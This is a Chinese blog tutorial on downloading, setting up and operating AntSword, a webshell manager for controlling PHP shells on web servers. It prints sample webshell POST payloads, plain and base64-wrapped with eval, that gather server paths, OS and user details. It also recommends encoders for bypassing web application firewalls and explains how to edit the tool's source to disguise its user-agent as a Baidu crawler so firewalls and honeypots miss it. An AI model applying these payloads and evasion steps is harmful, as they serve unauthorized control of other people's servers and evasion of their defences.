一、中國(guó)蟻劍下載、安裝

百度網(wǎng)盤(pán)鏈接：https://pan.baidu.com/s/1Fl0_hFtCtfUgcNIOwKeGEA
提取碼：nvjc

共包含2個(gè)文件：
antSword.zip
AntSword-Loader-v4.0.3-win32-x64.zip

由于我下載的是“AntSword-Loader-v4.0.3-win32-x64.zip”，我就以Windows版本64位來(lái)示例了。

1、我們解壓“AntSword-Loader-v4.0.3-win32-x64.zip”后，雙擊“AntSword.exe”；

第一次安裝項(xiàng)目需要先初始化，如果你已經(jīng)下載了核心源碼，就選擇項(xiàng)目源碼的文件夾。（如果只下載了加載器，選擇一個(gè)空文件夾，加載器會(huì)自動(dòng)幫你下載核心項(xiàng)目源碼）。

注意：這個(gè)項(xiàng)目文件夾就是你以后需要備份的，存儲(chǔ)著你的shell和shell內(nèi)的資料。

2、等初始化完成后，再雙擊“AntSword.exe”即可正常啟動(dòng)！

二、蟻劍的使用

1、添加一個(gè)shell

首先：右鍵單擊 - 添加數(shù)據(jù)；
其次：輸入U(xiǎn)RL地址，連接密碼以及編碼設(shè)置。PHP語(yǔ)言推薦編輯器使用chr加密；
再次：如果需要自己寫(xiě)編碼器的加密類(lèi)型，可以按下圖來(lái)操作：
還可以配置shell的請(qǐng)求信息和post內(nèi)容；

最后：還可以配置全局代理；

2、插件

中國(guó)蟻劍有一個(gè)插件市場(chǎng)（ctrl+shift+p），可以安裝一些插件，插件有很多。以下是部份插件截圖：

3、關(guān)于編碼器

編碼器是這個(gè)程序的過(guò)人之處，用編碼器加密可以輕松繞過(guò)WAF。

不妨，我們來(lái)對(duì)比一下默認(rèn)不使用編碼傳輸和base64編碼傳輸?shù)膮^(qū)別：
base64編碼

明文傳輸，post內(nèi)容為：

ant=@ini_set("display_errors", "0");@set_time_limit(0);echo "3e231";$D=dirname($_SERVER["SCRIPT_FILENAME"]);if($D=="")$D=dirname($_SERVER["PATH_TRANSLATED"]);$R="{$D} ";if(substr($D,0,1)!="/"){foreach(range("C","Z")as $L)if(is_dir("{$L}:"))$R.="{$L}:";}else{$R.="/";}$R.=" ";$u=(function_exists("posix_getegid"))?@posix_getpwuid(@posix_geteuid()):"";$s=($u)?$u["name"]:@get_current_user();$R.=php_uname();$R.=" {$s}";echo $R;;echo "8e51f";die();

base64加密傳輸，post內(nèi)容為：

_0x4ee8506e59871=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwgIjAiKTtAc2V0X3RpbWVfbGltaXQoMCk7ZWNobyAiNzk1ODAiOyREPWRpcm5hbWUoJF9TRVJWRVJbIlNDUklQVF9GSUxFTkFNRSJdKTtpZigkRD09IiIpJEQ9ZGlybmFtZSgkX1NFUlZFUlsiUEFUSF9UUkFOU0xBVEVEIl0pOyRSPSJ7JER9CSI7aWYoc3Vic3RyKCRELDAsMSkhPSIvIil7Zm9yZWFjaChyYW5nZSgiQyIsIloiKWFzICRMKWlmKGlzX2RpcigieyRMfToiKSkkUi49InskTH06Ijt9ZWxzZXskUi49Ii8iO30kUi49IgkiOyR1PShmdW5jdGlvbl9leGlzdHMoInBvc2l4X2dldGVnaWQiKSk/QHBvc2l4X2dldHB3dWlkKEBwb3NpeF9nZXRldWlkKCkpOiIiOyRzPSgkdSk/JHVbIm5hbWUiXTpAZ2V0X2N1cnJlbnRfdXNlcigpOyRSLj1waHBfdW5hbWUoKTskUi49Igl7JHN9IjtlY2hvICRSOztlY2hvICIwOWE3ZSI7ZGllKCk7&ant=@eval(@base64_decode($_POST[_0x4ee8506e59871]));

注意：其中，ant參數(shù)名稱是shell密碼。

再來(lái)看看chr編碼傳輸，完全就全部編碼了。

4、user-agent修改

要注意的是，軟件默認(rèn)的user-agent是：User-Agent: antSword/v2.0；而且大部分人都不會(huì)去自定義useragent，這就給waf和蜜罐白白送了一個(gè)特征，所以我們要修改一下源代碼：

修改項(xiàng)目路徑：

antSword\modules\request.js （修改const USER_AGENT = ‘a(chǎn)ntSword/v2.1’; 這一行代碼！）

antSword\modules\update.js （有兩處要修改；可搜索“antSword/v2.0”來(lái)找到這兩行代碼！）

我這里是把a(bǔ)ntSword/v2.0或antSword/v2.1修改為了Baiduspider-image，我改成了百度圖片蜘蛛；
如果大家還有什么不懂的，請(qǐng)查看中文說(shuō)明書(shū)：https://doc.u0u.us/zh-hans/

參考博文：https://www.fujieace.com/hacker/tools/antsword.html

總結(jié)

以上是生活随笔為你收集整理的中国蚁剑的下载、安装与使用的全部?jī)?nèi)容，希望文章能夠幫你解決所遇到的問(wèn)題。

如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。